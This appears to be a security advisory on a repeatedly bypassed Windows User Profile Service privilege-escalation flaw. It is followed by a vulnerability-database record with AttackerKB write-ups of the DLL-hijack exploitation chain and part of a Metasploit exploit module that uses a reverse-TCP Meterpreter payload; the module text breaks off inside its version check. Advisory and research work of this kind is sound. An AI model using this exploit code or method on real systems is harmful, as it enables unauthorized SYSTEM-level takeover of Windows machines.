THREAT LEVEL: Amber. For a detailed advisory, download the pdf file here.

After seven months, a vulnerability that was first addressed in the August 2021 Patch Tuesday release remains unpatched. This locally exploitable vulnerability is tracked as CVE-2021-34484 and affects the Windows User Profile Service. Although a proof of concept has been available for some time, the flaw has not been observed being actively exploited in the wild.

This Elevation of Privilege vulnerability was found by researcher Abdelhamid Naceri and reported to Microsoft, which addressed it in its August 2021 release. Soon after the fix was issued, Naceri noted that it was incomplete and presented a proof of concept (POC) that bypassed it on all Windows versions. At that point the 0patch team published an unofficial security update for all Windows versions and made it available as a free download to all registered users. Microsoft then patched the flaw again in its January 2022 release, tracking it as CVE-2022-21919. Naceri, however, discovered a way around this second patch as well. Microsoft's second attempt also altered the "profext.dll" file, which removed the unofficial 0patch workaround from every system that had installed the January 2022 Windows updates.

Organizations can apply the 0patch unofficial patch for this vulnerability using the steps below:
1. Update Windows 10 to the latest March 2022 patch.
2. Create a free account in 0patch Central.
3. Install and register the 0patch Agent.
4. An automated micro-patching process will initiate and apply this patch.
Potential MITRE ATT&CK TTPs are:
TA0042: Resource Development
T1588: Obtain Capabilities
T1588.006: Obtain Capabilities: Vulnerabilities
TA0001: Initial Access
T1190: Exploit Public-Facing Application
TA0004: Privilege Escalation
T1068: Exploitation for Privilege Escalation
TA0005: Defense Evasion
T1548: Abuse Elevation Control Mechanism

Vulnerability Details

References
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21919
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34484
https://www.bleepingcomputer.com/news/microsoft/windows-zero-day-flaw-giving-admin-rights-gets-unofficial-patch-again/
https://blog.0patch.com/2022/03/a-bug-that-doesnt-want-to-die-cve-2021.html
{"id": "HIVEPRO:98B56CB60C0C2B248824B5ECAE47E387", "vendorId": null, "type": "hivepro", "bulletinFamily": "info", "title": "Microsoft\u2019s privilege escalation vulnerability that refuses to go away", "description": "THREAT LEVEL: Amber. For a detailed advisory, download the pdf file here After seven months, a vulnerability that was addressed in August 2021 patch Tuesday remained unpatched. This locally exploited vulnerability is tracked as CVE-2021-34484 and affects the Windows User Profile Service. While Proof-of-concept is been available for some time now, it is not been actively exploited in the wild. This Elevation of Privilege vulnerability was found by renowned researcher Abdelhamid Naceri and reported to Microsoft, which addressed it in their August 2021 release. Naceri noted that Microsoft's fix was incomplete soon after it was issued and presented a proof of concept (POC) that bypassed it on all Windows versions. That is when the 0patch team, published an unofficial security update for all Windows versions and made it available for free download to all registered users. Microsoft then patched this security flaw in their January 2022 release, tracking it as CVE-2022-21919. Naceri, on the other hand, discovered a way around this second patch. However, Microsoft's second attempt to fix the bug altered the "profext.dll" file, resulting in the removal of the unofficial workaround of 0patch from everyone who had installed the January 2022 Windows updates. Organizations could apply the 0patch unofficial patch to patch this vulnerability using the steps given below: 1. Update Windows 10 to the latest March 2022 patch.2. Create a free account in 0patch Central3. Install and register the 0patch Agent4. An automated micro-patching process will initiate to apply this patch. 
Potential MITRE ATT&CK TTPs are: TA0042: Resource DevelopmentT1588: Obtain CapabilitiesT1588.006: Obtain Capabilities: VulnerabilitiesTA0001: Initial AccessT1190: Exploit Public-Facing ApplicationTA0004: Privilege EscalationT1068: Exploitation for Privilege EscalationTA0005: Defense Evasion T1548: Abuse Elevation Control Mechanism Vulnerability Details References https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21919 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34484 https://www.bleepingcomputer.com/news/microsoft/windows-zero-day-flaw-giving-admin-rights-gets-unofficial-patch-again/ https://blog.0patch.com/2022/03/a-bug-that-doesnt-want-to-die-cve-2021.html", "published": "2022-03-25T13:56:19", "modified": "2022-03-25T13:56:19", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "accessVector": "LOCAL", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 6.9}, "severity": "MEDIUM", "exploitabilityScore": 3.4, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://www.hivepro.com/microsofts-privilege-escalation-vulnerability-that-refuses-to-go-away/", "reporter": "Hive Pro", "references": [], "cvelist": ["CVE-2021-34484", "CVE-2022-21919"], "immutableFields": [], "lastseen": 
"2022-03-25T14:28:59", "viewCount": 20, "enchantments": {"score": {"value": 0.9, "vector": "NONE"}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:2A1BFBBE-FD48-497E-8F3E-BB65670A94FA", "AKB:5ABBD3E2-AA30-41CB-96DA-34B5E76D030C", "AKB:C32E9872-B8A4-43F3-A8CC-05532AA65E51"]}, {"type": "avleonov", "idList": ["AVLEONOV:535BC5E36A5D2C8F60753A2CD4676692"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2022-0003"]}, {"type": "cve", "idList": ["CVE-2021-34484", "CVE-2022-21895", "CVE-2022-21919"]}, {"type": "hivepro", "idList": ["HIVEPRO:C224B728F67C8D1703A8BF2411600695", "HIVEPRO:E7F36EC1E4DCF018F94ECD22747B7093"]}, {"type": "kaspersky", "idList": ["KLA12250", "KLA12259", "KLA12422", "KLA12423"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:DACEDE0F6B5888B6C6E281338C4B9980"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2022_26904_SUPERPROFILE-"]}, {"type": "mscve", "idList": ["MS:CVE-2021-34484", "MS:CVE-2022-21895", "MS:CVE-2022-21919"]}, {"type": "nessus", "idList": ["SMB_NT_MS21_AUG_5005030.NASL", "SMB_NT_MS21_AUG_5005031.NASL", "SMB_NT_MS21_AUG_5005033.NASL", "SMB_NT_MS21_AUG_5005040.NASL", "SMB_NT_MS21_AUG_5005043.NASL", "SMB_NT_MS21_AUG_5005089.NASL", "SMB_NT_MS21_AUG_5005094.NASL", "SMB_NT_MS21_AUG_5005095.NASL", "SMB_NT_MS21_AUG_5005106.NASL", "SMB_NT_MS22_JAN_5009543.NASL", "SMB_NT_MS22_JAN_5009545.NASL", "SMB_NT_MS22_JAN_5009546.NASL", "SMB_NT_MS22_JAN_5009555.NASL", "SMB_NT_MS22_JAN_5009557.NASL", "SMB_NT_MS22_JAN_5009566.NASL", "SMB_NT_MS22_JAN_5009585.NASL", "SMB_NT_MS22_JAN_5009595.NASL", "SMB_NT_MS22_JAN_5009601.NASL", "SMB_NT_MS22_JAN_5009619.NASL", "SMB_NT_MS22_JAN_5009621.NASL"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0F0ACCA731E84F3B1067935E483FC950"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:20364300767E58631FFE0D21622E63A3", "RAPID7BLOG:DE426F8A59CA497BB6C0B90C0F1849CD"]}, {"type": "securelist", "idList": ["SECURELIST:11665FFD7075FB9D59316195101DE894"]}, {"type": "thn", "idList": 
["THN:00A15BC93C4697B74FA1D56130C0C35E", "THN:BABD510622DAA320F3F1F55EEDD7549A"]}, {"type": "threatpost", "idList": ["THREATPOST:05E04E358AB0AB9A5BF524854B34E49D", "THREATPOST:53A062956C31459E2846CD4C959DFD49", "THREATPOST:84909E392F4171398A52202CCC4E215A", "THREATPOST:95B32358658F5FEFA1715F69C5D6051D"]}, {"type": "zdi", "idList": ["ZDI-21-966"]}, {"type": "zdt", "idList": ["1337DAY-ID-37625"]}]}, "epss": [{"cve": "CVE-2021-34484", "epss": "0.001340000", "percentile": "0.468380000", "modified": "2023-03-19"}, {"cve": "CVE-2022-21919", "epss": "0.008330000", "percentile": "0.794290000", "modified": "2023-03-19"}], "vulnersScore": 0.9}, "_state": {"score": 1684013994, "dependencies": 1659988328, "epss": 1679287104}, "_internal": {"score_hash": "e283f4976f3cafc045453f24b7acb0c9"}}
{"attackerkb": [{"lastseen": "2023-06-14T14:47:42", "description": "Windows User Profile Service Elevation of Privilege Vulnerability\n\n \n**Recent assessments:** \n \n**ccondon-r7** at March 29, 2022 12:10pm UTC reported:\n\nThis bug was evidently [used by LAPSUS$](<https://twitter.com/billdemirkapi/status/1508527492285575172>) in the wild as part of the attack on Okta.\n\n**gwillcox-r7** at March 30, 2022 4:21pm UTC reported:\n\nThis bug was evidently [used by LAPSUS$](<https://twitter.com/billdemirkapi/status/1508527492285575172>) in the wild as part of the attack on Okta.\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-12T00:00:00", "type": "attackerkb", "title": "CVE-2021-34484", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484", "CVE-2022-21919", "CVE-2022-26904"], "modified": "2021-08-24T00:00:00", "id": "AKB:2A1BFBBE-FD48-497E-8F3E-BB65670A94FA", "href": "https://attackerkb.com/topics/qo2zIGKm9O/cve-2021-34484", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, 
{"lastseen": "2023-06-29T02:20:49", "description": "Windows User Profile Service Elevation of Privilege Vulnerability\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at March 30, 2022 4:52pm UTC reported:\n\nThis is a bypass for [CVE-2022-21919](<https://attackerkb.com/topics/2sQXBnLJYq/cve-2022-21919>) which is in turn a bypass for [CVE-2021-34484](<https://attackerkb.com/topics/qo2zIGKm9O/cve-2021-34484?referrer=search>). As noted at <https://twitter.com/billdemirkapi/status/1508527492285575172>, CVE-2022-21919 was already being exploited in the wild by using the binary from <https://github.com/klinix5/ProfSvcLPE/blob/main/DoubleJunctionEoP/Release/UserProfileSvcEoP.exe>.\n\nThe vulnerability, near as I can tell, occurs due to the `CreateDirectoryJunction()` function inside `profext.dll` not appropriately validating things before creating a directory junction between two directories. This can allow an attacker to create a directory junction between a directory they have access to and another directory that they should not have access to, thereby granting them the ability to plant files in sensitive locations and or read sensitive files.\n\nThe exploit code for this, which was originally at <https://github.com/klinix5/SuperProfile> but which got taken down, is now available at <https://github.com/rmusser01/SuperProfile> and its associated forks. I have taken this code and updated it and touched it up a bit into a Metasploit exploit module that is now available at <https://github.com/rapid7/metasploit-framework/pull/16382>.\n\nThis exploit code utilizes this vulnerability to plant a malicious `comctl32.dll` binary in a location that the `Narrator.exe` program will try to load the DLL from when it starts. By utilizing the `ShellExecute` command with the `runas` option, we can force a UAC prompt to come up that will run the `consent.exe` program to run. 
If the `PromptOnSecureDesktop` setting is set to `1` which is the default, this will result in `consent.exe` running as `SYSTEM` on the secure desktop, and a new `narrator.exe` instance will also spawn as `SYSTEM` on the secure desktop, which will then load the malicious `comctl32.dll` DLL and allow us to execute our code as `SYSTEM`.\n\nNote that if `PromptOnSecureDesktop` is set to 0 under the key `HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System`, then this LPE will not be possible as the UAC prompt will spawn as the current user vs as `SYSTEM` on the restricted desktop, and therefore we will not achieve privilege elevation, so this is a workaround for the vulnerability whilst it is not patched.\n\nIt should be noted that as this stands the current exploit requires valid credentials for another user on the system who is a non-admin user and who has permissions to log into the target computer. They must also have a profile under `C:\\Users` for the exploit to function in its current state. There has been some rumors that it might be possible to do this without a secondary login, however nothing concrete has been found so far, so we are considering this a prerequisite for exploitation for the time being.\n\nWe, aka Rapid7, have reported this vulnerability to Microsoft and have given KLINIX5, who originally found this vulnerability and wrote the original exploit code, full credit for the discovery, however Microsoft have only given us this CVE number and have not provided a timeline on when they expect a fix for this vulnerability at this time. 
It is therefore recommended to use the mitigation above until an appropriate fix is developed.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-06-29T00:00:00", "type": "attackerkb", "title": "CVE-2022-26904", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484", "CVE-2022-21919", "CVE-2022-26904"], "modified": "2023-06-29T00:00:00", "id": "AKB:5ABBD3E2-AA30-41CB-96DA-34B5E76D030C", "href": "https://attackerkb.com/topics/RHSMbN1NQY/cve-2022-26904", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-07-15T11:22:27", "description": "Windows User Profile Service Elevation of Privilege Vulnerability. 
This CVE ID is unique from CVE-2022-21895.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at January 12, 2022 12:07am UTC reported:\n\nUpdate: As predicted there is a patch bypass for this, now labled as [CVE-2022-26904](<https://attackerkb.com/topics/RHSMbN1NQY/cve-2022-26904>)\n\nAccording to <https://twitter.com/KLINIX5/status/1480996599165763587> this appears to be a patch for the code blogged about at <https://halove23.blogspot.com/2021/10/windows-user-profile-service-0day.html>. The details on this bug can be found at <https://github.com/klinix5/ProfSvcLPE/blob/main/write-up.docx> but I\u2019ll summarize them here for brevity.\n\nThe original incomplete patch, aka [CVE-2021-34484](<https://attackerkb.com/topics/qo2zIGKm9O/cve-2021-34484>) is explained best by Mitja Kolsek at <https://blog.0patch.com/2021/11/micropatching-incompletely-patched.html> where he notes that bug was originally considered to be an arbitrary directory deletion bug that allowed a logged on user to delete a folder on the computer.\n\nHowever upon reviewing the fix KLINUX5 found that it was possible to not only bypass the fix, but also make the vulnerability more impactful.\n\nSpecifically by abusing the User Profile Service\u2019s code which creates a temporary user profile folder (to protect against the original user profile folder being damaged etc), and then copies folders and files from the original profile folder to the backup, one can instead place a symbolic link. 
When this symbolic link is followed, it can allow the attacker to create attacker-writeable folders in a protected location and then perform a DLL hijacking attack against high privileged system processes.\n\nUnfortunately when patching this bug, Microsoft correctly assumed that one should check that the temporary user folder (aka `C:\\Users\\TEMP`), is not a symbolic link, but didn\u2019t check to see if any of the folders under `C:\\Users\\TEMP` contains a symbolic link.\n\nNote that as noted in <https://blog.0patch.com/2021/11/micropatching-incompletely-patched.html> this bug does require winning a race condition so exploitation is 100% reliable however there are ways to win the race condition as was shown in the code for the patch bypass published at <https://github.com/klinix5/ProfSvcLPE/tree/main/DoubleJunctionEoP>.\n\nI\u2019d keep an eye on this one as KLINIX5 has a habit of finding patch bypasses for his bugs and if he says Microsoft has messed things up again, more than likely there will be another patch bypass for this bug. 
I\u2019m still looking into exactly what was patched here though.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-08T00:00:00", "type": "attackerkb", "title": "CVE-2022-21919", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484", "CVE-2022-21895", "CVE-2022-21919", "CVE-2022-26904"], "modified": "2022-02-08T00:00:00", "id": "AKB:C32E9872-B8A4-43F3-A8CC-05532AA65E51", "href": "https://attackerkb.com/topics/2sQXBnLJYq/cve-2022-21919", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2023-06-21T21:04:38", "description": "The user profile service, identified as ProfSrv, is vulnerable to a local privilege elevation vulnerability in its CreateDirectoryJunction() function due to a lack of appropriate checks on the directory structure of the junctions it tries to link together. 
Attackers can leverage this vulnerability to plant a malicious DLL in a system directory and then trigger a UAC prompt to cause this DLL to be loaded and executed by ProfSrv as the NT AUTHORITY\\SYSTEM user. Note that this bug was originally identified as CVE-2021-34484 and was subsequently patched a second time as CVE-2022-21919, however both patches were found to be insufficient. This bug is a patch bypass for CVE-2022-21919 and at the time of publishing, has not yet been patched, though plans are in place to patch it as CVE-2022-26904. It is important to note that the credentials supplied for the second user to log in as in this exploit must be those of a normal non-admin user and these credentials must also corralate with a user who has already logged in at least once before. Additionally the current user running the exploit must have UAC set to the highest level, aka \"Always Notify Me When\", in order for the code to be executed as NT AUTHORITY\\SYSTEM. Note however that \"Always Notify Me When\" is the default UAC setting on common Windows installs, so this would only affect instances where this setting has been changed either manually or as part of the installation process.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-21T17:05:48", "type": "metasploit", "title": "User Profile Arbitrary Junction Creation Local Privilege Elevation", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", 
"confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484", "CVE-2022-21919", "CVE-2022-26904"], "modified": "2023-06-16T00:07:35", "id": "MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2022_26904_SUPERPROFILE-", "href": "https://www.rapid7.com/db/modules/exploit/windows/local/cve_2022_26904_superprofile/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Exploit::FileDropper\n include Msf::Post::Windows::FileInfo\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Version\n include Msf::Post::Windows::Process\n include Msf::Post::Windows::ReflectiveDLLInjection\n include Msf::Exploit::EXE # Needed for generate_payload_dll\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n {\n 'Name' => 'User Profile Arbitrary Junction Creation Local Privilege Elevation',\n 'Description' => %q{\n The user profile service, identified as ProfSrv, is vulnerable to a local privilege elevation vulnerability\n in its CreateDirectoryJunction() function due to a lack of appropriate checks on the directory structure of\n the junctions it tries to link together.\n\n Attackers can leverage this vulnerability to plant a malicious DLL in a system directory and then trigger a\n UAC prompt to cause this DLL to be loaded and executed by ProfSrv as the NT AUTHORITY\\SYSTEM user.\n\n Note that this bug was originally identified as CVE-2021-34484 and was subsequently patched a second time as\n CVE-2022-21919, however both patches were found to be 
insufficient. This bug is a patch bypass for\n CVE-2022-21919 and at the time of publishing, has not yet been patched, though plans are in place to patch it\n as CVE-2022-26904.\n\n It is important to note that the credentials supplied for the second user to log in as in this exploit must be\n those of a normal non-admin user and these credentials must also corralate with a user who has already logged in\n at least once before. Additionally the current user running the exploit must have UAC set to the highest level,\n aka \"Always Notify Me When\", in order for the code to be executed as NT AUTHORITY\\SYSTEM. Note however that\n \"Always Notify Me When\" is the default UAC setting on common Windows installs, so this would only affect instances\n where this setting has been changed either manually or as part of the installation process.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'KLINIX5', # Aka Abdelhamid Naceri. Original PoC w Patch Bypass\n 'Grant Willcox' # Metasploit module + Tweaks to PoC\n ],\n 'Arch' => [ ARCH_X64 ],\n 'Platform' => 'win',\n 'SessionTypes' => [ 'meterpreter' ],\n 'Targets' => [\n [ 'Windows 11', { 'Arch' => ARCH_X64 } ]\n ],\n 'References' => [\n ['CVE', '2022-26904'],\n ['URL', 'https://github.com/rmusser01/SuperProfile'], # Original link was at https://github.com/klinix5/SuperProfile/ but was taken down. 
This is a backup.\n ['URL', 'https://web.archive.org/web/20220222105232/https://halove23.blogspot.com/2022/02/blog-post.html'], # Original blog post\n ['URL', 'https://github.com/klinix5/ProfSvcLPE/blob/main/write-up.docx'] # Discussion of previous iterations of this bug providing insight into patched functionality.\n ],\n 'DisclosureDate' => '2022-03-17', # Date MSRC supplied CVE number, bug is not patched atm.\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [ CRASH_SAFE, ],\n 'Reliability' => [ REPEATABLE_SESSION ], # Will need to double check this as this may require some updates to the code to get it to the point where it can be used repetitively.\n 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, SCREEN_EFFECTS, AUDIO_EFFECTS ]\n },\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'WfsDelay' => 300\n },\n 'AKA' => [ 'SuperProfile' ]\n }\n )\n )\n\n register_options([\n OptString.new('LOGINUSER', [true, 'Username of the secondary normal privileged user to log in as. Cannot be the same as the current user!']),\n OptString.new('LOGINDOMAIN', [true, 'Domain that the LOGINUSER belongs to. 
Ensures we log into the right domain.', '.']),\n OptString.new('LOGINPASSWORD', [true, 'Password for the secondary normal privileged user to log in as'])\n ])\n end\n\n def check\n sysinfo_value = sysinfo['OS']\n\n if sysinfo_value !~ /windows/i\n # Non-Windows systems are definitely not affected.\n return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')\n end\n\n # see https://docs.microsoft.com/en-us/windows/release-information/\n version = get_version_info\n unless version.build_number.between?(Msf::WindowsVersion::Server2008_SP0, Msf::WindowsVersion::Win10_21H2) ||\n version.build_number == Msf::WindowsVersion::Win11_21H2 ||\n version.build_number == Msf::WindowsVersion::Server2022\n return CheckCode::Safe('Target is not running a vulnerable version of Windows!')\n end\n\n print_status('Checking if PromptOnSecureDesktop mitigation applied...')\n reg_key = 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System'\n reg_val = 'PromptOnSecureDesktop'\n begin\n root_key, base_key = @session.sys.registry.splitkey(reg_key)\n value = @session.sys.registry.query_value_direct(root_key, base_key, reg_val)\n rescue Rex::Post::Meterpreter::RequestError => e\n return CheckCode::Unknown(\"Was not able to retrieve the PromptOnSecureDesktop value. Error was #{e}\")\n end\n\n if value.data == 0\n return CheckCode::Safe('PromptOnSecureDesktop is set to 0, mitigation applied!')\n elsif value.data == 1\n print_good('PromptOnSecureDesktop is set to 1, should be safe to proceed!')\n else\n return CheckCode::Unknown(\"PromptOnSecureDesktop was not set to a known value, are you sure the target system isn't corrupted?\")\n end\n\n # Build numbers taken from https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26904, and associated\n # security update information (e.g. 
https://support.microsoft.com/en-us/topic/windows-10-update-history-857b8ccb-71e4-49e5-b3f6-7073197d98fb,\n # https://support.microsoft.com/en-us/topic/windows-11-version-21h2-update-history-a19cd327-b57f-44b9-84e0-26ced7109ba9)\n if version.build_number == Msf::WindowsVersion::Win11_21H2 && version.build_number.revision_number.between?(0, 612)\n return CheckCode::Appears('Vulnerable Windows 11 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Server2022 && version.build_number.revision_number.between?(0, 642)\n return CheckCode::Appears('Vulnerable Windows Server 2022 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_21H2 && version.build_number.revision_number.between?(0, 1644)\n return CheckCode::Appears('Vulnerable Windows 10 21H2 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_21H1 && version.build_number.revision_number.between?(0, 1644)\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 21H1 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_20H2 && version.build_number.revision_number.between?(0, 1644)\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 20H2 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_2004\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v2004 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_1909 && version.build_number.revision_number.between?(0, 2211)\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1909 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_1903\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1903 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_1809 && version.build_number.revision_number.between?(0, 2802)\n target_not_presently_supported\n 
return CheckCode::Appears('Vulnerable Windows 10 v1809 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_1803\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1803 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_1709\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1709 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_1703\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1703 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_1607 && version.build_number.revision_number.between?(0, 5065)\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1607 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_1511\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1511 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_1507\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1507 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win81 # Includes Server 2012 R2\n target_not_presently_supported\n return CheckCode::Detected('Windows 8.1/Windows Server 2012 R2 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win8 # Includes Server 2012\n target_not_presently_supported\n return CheckCode::Detected('Windows 8/Windows Server 2012 build detected!')\n elsif version.build_number.between?(Msf::WindowsVersion::Win7_SP0, Msf::WindowsVersion::Win7_SP1) # Includes Server 2008 R2\n target_not_presently_supported\n return CheckCode::Detected('Windows 7/Windows Server 2008 R2 build detected!')\n elsif version.build_number.between?(Msf::WindowsVersion::Server2008_SP0, Msf::WindowsVersion::Server2008_SP2_Update) # Includes Server 2008\n target_not_presently_supported\n return 
